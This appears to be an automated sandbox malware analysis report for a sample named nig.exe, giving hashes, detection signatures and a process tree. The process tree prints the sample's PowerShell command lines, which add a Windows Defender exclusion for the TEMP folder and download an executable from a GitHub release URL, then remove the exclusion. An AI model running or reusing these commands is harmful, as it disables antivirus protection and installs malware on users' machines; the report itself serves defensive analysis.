Analysis
max time kernel: 119s
max time network: 120s
platform: windows7_x64
resource: win7-20250207-en
resource tags: arch:x64, arch:x86, image:win7-20250207-en, locale:en-us, os:windows7-x64, system
submitted: 22/03/2025, 02:34
Behavioral task: behavioral1
Sample: nig.exe
Resource: win7-20250207-en

Behavioral task: behavioral2
Sample: nig.exe
Resource: win10v2004-20250314-en
General
Target: nig.exe
Size: 56KB
MD5: 827c7f426f6d6770d127ee96a29ad6db
SHA1: 0ed96a36e037baef30f459cc54a50db51ca0e9d9
SHA256: 90e7162a771d6d4ad5e46f38611fec16d2dee5583d628ef7bf205e727e6ebff4
SHA512: c2cba465541b8f5ecd7e8fd48bcbf7a02c97279b7c7edb10601d8d7646b28bb30059470248164a13122fd65de2a8318d4f337739dac326ea871d870bd1d8b782
SSDEEP: 1536:U4dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNHmn5aHc:U4dzVTaer344JzthRZijQ1J6
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (matched on the two PowerShell processes flagged with this signature in the process tree)
pid    Process
2232   powershell.exe
2156   powershell.exe

resource                                                                      yara_rule
behavioral1/memory/1716-0-0x0000000140000000-0x0000000140027000-memory.dmp    upx
behavioral1/memory/1716-27-0x0000000140000000-0x0000000140027000-memory.dmp   upx
Hide Artifacts: Ignore Process Interrupts (1 TTPs, 2 IoCs)
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid    Process
2232   powershell.exe
2960   powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Runs net.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
pid    Process
2232   powershell.exe
2156   powershell.exe
2960   powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
description               pid    Process
Token: SeDebugPrivilege   2232   powershell.exe
Token: SeDebugPrivilege   2156   powershell.exe
Token: SeDebugPrivilege   2960   powershell.exe

Suspicious use of WriteProcessMemory (18 IoCs)
description                          pid    Process   procid_target
PID 1716 wrote to memory of 2552     1716   nig.exe   30
PID 1716 wrote to memory of 2552     1716   nig.exe   30
PID 1716 wrote to memory of 2552     1716   nig.exe   30
PID 2552 wrote to memory of 1944     2552   cmd.exe   32
PID 2552 wrote to memory of 1944     2552   cmd.exe   32
PID 2552 wrote to memory of 1944     2552   cmd.exe   32
PID 1944 wrote to memory of 2652     1944   net.exe   33
PID 1944 wrote to memory of 2652     1944   net.exe   33
PID 1944 wrote to memory of 2652     1944   net.exe   33
PID 2552 wrote to memory of 2232     2552   cmd.exe   34
PID 2552 wrote to memory of 2232     2552   cmd.exe   34
PID 2552 wrote to memory of 2232     2552   cmd.exe   34
PID 2552 wrote to memory of 2156     2552   cmd.exe   35
PID 2552 wrote to memory of 2156     2552   cmd.exe   35
PID 2552 wrote to memory of 2156     2552   cmd.exe   35
PID 2552 wrote to memory of 2960     2552   cmd.exe   36
PID 2552 wrote to memory of 2960     2552   cmd.exe   36
PID 2552 wrote to memory of 2960     2552   cmd.exe   36
Processes (indentation shows the parent/child tree; depth as reported)

[1] C:\Users\Admin\AppData\Local\Temp\nig.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\nig.exe"
    - Suspicious use of WriteProcessMemory
    PID: 1716

  [2] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\903E.tmp\903F.tmp\9040.bat C:\Users\Admin\AppData\Local\Temp\nig.exe"
      - Suspicious use of WriteProcessMemory
      PID: 2552

    [3] C:\Windows\system32\net.exe
        Command line: net session
        - Suspicious use of WriteProcessMemory
        PID: 1944

      [4] C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 session
          PID: 2652

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
        - Command and Scripting Interpreter: PowerShell
        - Hide Artifacts: Ignore Process Interrupts
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2232

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2156

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
        - Hide Artifacts: Ignore Process Interrupts
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2960
Network
MITRE ATT&CK Enterprise v15
Downloads

- (file path not given in the report)
  Filesize: 2KB
  MD5: 1c935ef28fdfd394b770d945d7f04d76
  SHA1: 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
  SHA256: aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
  SHA512: a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 55b4828145e7be3154ddaec4bc256346
  SHA1: ffaa9b6f9ce342da0a5e5a6f0eb743ec775f74a7
  SHA256: cc298f9ce853d5c55e2f31db9ecda01262963dcc566d3019e8bb2b0605999de3
  SHA512: 6a28f9ddb3a42d9e3d170c13b9e885e041b2abd4baa7473bf646e18e4e6525ed5d6cc7570784cec8eb615750088b065a796066487c72cb5ed8b4104d10b223d0